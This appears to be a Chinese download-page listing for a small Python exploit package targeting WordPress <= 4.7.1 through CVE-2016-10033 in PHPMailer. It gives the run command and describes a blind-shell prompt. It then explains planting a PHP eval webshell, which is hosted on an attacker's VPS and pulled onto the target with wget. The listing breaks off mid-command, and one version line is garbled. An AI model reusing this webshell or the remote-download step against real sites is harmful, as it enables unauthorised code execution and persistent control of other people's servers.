【文件属性】:
文件名称:WordPress-RCE-EXP
文件大小:2KB
文件格式:ZIP
更新时间:2021-04-10 22:43:22
Python
WordPress-RCE-EXP
影响版本
漏洞编号:CVE-2016-10033 (基于)
WordPress <= 4.7.1
PHPMailer < 5> <目标站存在的用户名>
Python3 wp_rce_exp.py http://127.0.0.1/ admin
0x2漏洞利用
出现
Test_blind_shell>>>
后,说明网站存在RCE漏洞
有两种方式来漏洞利用
一、写入Webshell
1.在vps上开web服务,在web目录下的test.txt文件中写入一句话
<?php @eval($_POST[test]); ?>
2.目标使用wget下载到web目录上
(注意vps需要用ip地址,前面不能加http://)
Test_blind_shell>>>/usr/bin/wget --
【文件预览】:
WordPress-RCE-EXP-main
----wp-rce-exp.py(1KB)
----README.md(1KB)